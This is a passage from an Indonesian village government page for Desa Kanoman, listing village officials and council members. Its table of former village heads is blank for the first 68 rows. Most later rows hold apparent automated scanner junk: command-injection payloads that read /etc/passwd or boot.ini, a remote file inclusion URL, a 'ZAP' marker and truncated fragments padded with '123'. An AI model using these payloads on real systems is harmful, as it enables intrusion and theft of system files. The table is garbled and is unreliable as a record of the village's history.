Desa Kanoman

Beranda / Kecamatan Panjatan / Desa Kanoman

Desa : Kanoman
Kecamatan : Panjatan
Kepala Desa : SUHARTANA

# Nama Jabatan
1. SUPRIH ROHMADI (PJ. LURAH) Lurah
2. RILA REVA YANTI, S.PD. Carik
3. TRIJANTA Panata Laksana Sarta Pangripta
4. SURANTA, S.P Danarta
5. SUJASIN Jagabaya
6. MELINDA KOMALASARI Ulu-ulu
7. TRI YULI ANTORO, S.PD. Kamituwa
8. SUHARTANA Dukuh PEDUKUHAN I
9. SUMIYEM Dukuh PEDUKUHAN II
10. SURAHMAN Dukuh PEDUKUHAN III
11. SUMARDI Dukuh PEDUKUHAN IV
12. CRISTIANTO, S.PD. Dukuh PEDUKUHAN V
13. SUGENG RIYANTO Dukuh Pedukuhan VI

# Nama Jabatan
1. NGADIKUN Ketua
2. LILIS SETIYANINGSIH, S.PD Wakil Ketua
3. RECHY BEKTI RAMADHANI Sekretaris
4. RACHMADI Ketua Bidang Penyelenggaraan Pemerintah Kalurahan
5. SARNA Ketua Bidang Pembangunan Kalurahan dan Pemberdayaa
6. SURYANTINI Anggota
7. SUDARMIYATUN Anggota

# Nama Kepala Desa Awal Masa Jabatan Akhir Masa Jabatan
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69. 123 "> 123
70. 123 "> 123
71. 123 .sys 123
72. 123 .sys 123
73. 123 .sys 123
74. 123 .sys 123
75. 123 123 ">
76. 123 123 ">
77. 123 123 .sys
78. 123 123 .sys
79. 123 123 .sys
80. 123 123 .sys
81. ;system("cat /etc/passwd"). 123 123
82. .system("cat /etc/passwd"). 123 123
83. system("cat /etc/passwd"); 123 123
84. :system("cat /etc/passwd"); 123 123
85. |cat /etc/passwd.dat| 123 123
86. |cat /etc/passwd| 123 123
87. |cat /etc/passwd.htm| 123 123
88. |cat /etc/passwd.html| 123 123
89. |cat /etc/passwd| 123 123
90. |cat /etc/passwd 123 123
91. |type c:oot.ini 123 123
92. ;system("cat /etc/passwd") 123 123
93. ;system("cat /etc/passwd"); 123 123
94. `cat /etc/passwd`; 123 123
95. ;system("type c:oot.ini") 123 123
96. ;system("type c:oot.ini"). 123 123
97. ;type c:oot.ini; 123 123
98. `type c:oot.ini` 123 123
99. `type c:oot.ini`; 123 123
100. http://uniscan.sourceforge.net/c.txt? 123 123
101. 123" 123 123
102. 123 123
103. "> 123 123
104. ;system("type c:oot.ini"). 123 123
105. :system("type c:oot.ini"). 123 123
106. ;system("type c:oot.ini"); 123 123
107. :system("type c:oot.ini"); 123 123
108. `cat /etc/passwd` 123 123
109. :system("cat /etc/passwd"). 123 123
110. ;cat /etc/passwd; 123 123
111. |type c:oot.ini.html| 123 123
112. |type c:oot.ini| 123 123
113. |type c:oot.ini| 123 123
114. |type c:oot.ini.dat| 123 123
115. system("type c:oot.ini"); 123 123
116. |type c:oot.ini.htm| 123 123
117. .system("type c:oot.ini"). 123 123
118. 123" 123 123
119. .system("cat /etc/passwd"). 123 123
120. system("type c:oot.ini"); 123 123
121. .system("type c:oot.ini"). 123 123
122. |cat /etc/passwd.dat| 123 123
123. ;system("cat /etc/passwd"). 123 123
124. |type c:oot.ini.dat| 123 123
125. |type c:oot.ini.htm| 123 123
126. |type c:oot.ini.html| 123 123
127. |type c:oot.ini| 123 123
128. `cat /etc/passwd`; 123 123
129. |type c:oot.ini| 123 123
130. ;cat /etc/passwd; 123 123
131. |type c:oot.ini 123 123
132. ;system("cat /etc/passwd") 123 123
133. ;system("cat /etc/passwd"); 123 123
134. `type c:oot.ini`; 123 123
135. :system("cat /etc/passwd"). 123 123
136. :system("cat /etc/passwd"); 123 123
137. system("cat /etc/passwd"); 123 123
138. |cat /etc/passwd.htm| 123 123
139. :system("type c:oot.ini"); 123 123
140. |cat /etc/passwd| 123 123
141. "> 123 123
142. 123 123
143. |cat /etc/passwd 123 123
144. 123" 123 123
145. ;system("type c:oot.ini"); 123 123
146. http://uniscan.sourceforge.net/c.txt? 123 123
147. |cat /etc/passwd.html| 123 123
148. :system("type c:oot.ini"). 123 123
149. `cat /etc/passwd` 123 123
150. |cat /etc/passwd| 123 123
151. ;type c:oot.ini; 123 123
152. ;system("type c:oot.ini") 123 123
153. `type c:oot.ini` 123 123
154. 123 123 123"
155. 123 123 123"
156. 123 123 123"
157. 123 123 :sys
158. 123 123 :sys
159. 123 123 :sys
160. 123 123 :sys
161. 123 123 :sys
162. 123 123 :sys
163. 123 123 :sys
164. 123 123 :sys
165. 123 123 ;cat
166. 123 123 ;cat
167. 123 123 ;sys
168. 123 123 ;sys
169. 123 123 ;sys
170. 123 123 ;sys
171. 123 123 ;sys
172. 123 123 ;sys
173. 123 123 ;sys
174. 123 123 ;sys
175. 123 123 ;sys
176. 123 123 ;sys
177. 123 123 ;sys
178. 123 123 ;sys
179. 123 123 ;typ
180. 123 123 ;typ
181. 123 123
182. 123 123
183. 123 123 http
184. 123 123 http
185. 123 123 syst
186. 123 123 syst
187. 123 123 syst
188. 123 123 syst
189. 123 123 `cat
190. 123 123 `cat
191. 123 123 `cat
192. 123 123 `cat
193. 123 123 `typ
194. 123 123 `typ
195. 123 123 `typ
196. 123 123 `typ
197. 123 123 |cat
198. 123 123 |cat
199. 123 123 |cat
200. 123 123 |cat
201. 123 123 |cat
202. 123 123 |cat
203. 123 123 |cat
204. 123 123 |cat
205. 123 123 |cat
206. 123 123 |cat
207. 123 123 |cat
208. 123 123 |cat
209. 123 123 |typ
210. 123 123 |typ
211. 123 123 |typ
212. 123 123 |typ
213. 123 123 |typ
214. 123 123 |typ
215. 123 123 |typ
216. 123 123 |typ
217. 123 123 |typ
218. 123 123 |typ
219. 123 123 |typ
220. 123 123 |typ
221. 123 123" 123
222. 123 123" 123
223. 123 123" 123
224. 123 :sys 123
225. 123 :sys 123
226. 123 :sys 123
227. 123 :sys 123
228. 123 :sys 123
229. 123 :sys 123
230. 123 :sys 123
231. 123 :sys 123
232. 123 ;cat 123
233. 123 ;cat 123
234. 123 ;sys 123
235. 123 ;sys 123
236. 123 ;sys 123
237. 123 ;sys 123
238. 123 ;sys 123
239. 123 ;sys 123
240. 123 ;sys 123
241. 123 ;sys 123
242. 123 ;sys 123
243. 123 ;sys 123
244. 123 ;sys 123
245. 123 ;sys 123
246. 123 ;typ 123
247. 123 ;typ 123
248. 123 123
249. 123 123
250. 123 http 123
251. 123 http 123
252. 123 syst 123
253. 123 syst 123
254. 123 syst 123
255. 123 syst 123
256. ZAP ZAP ZAP
257. 123 `cat 123
258. 123 `cat 123
259. 123 `cat 123
260. 123 `cat 123
261. 123 `typ 123
262. 123 `typ 123
263. 123 `typ 123
264. 123 `typ 123
265. 123 |cat 123
266. 123 |cat 123
267. 123 |cat 123
268. 123 |cat 123
269. 123 |cat 123
270. 123 |cat 123
271. 123 |cat 123
272. 123 |cat 123
273. 123 |cat 123
274. 123 |cat 123
275. 123 |cat 123
276. 123 |cat 123
277. 123 |typ 123
278. 123 |typ 123
279. 123 |typ 123
280. 123 |typ 123
281. 123 |typ 123
282. 123 |typ 123
283. 123 |typ 123
284. 123 |typ 123
285. 123 |typ 123
286. 123 |typ 123
287. 123 |typ 123
288. 123 |typ 123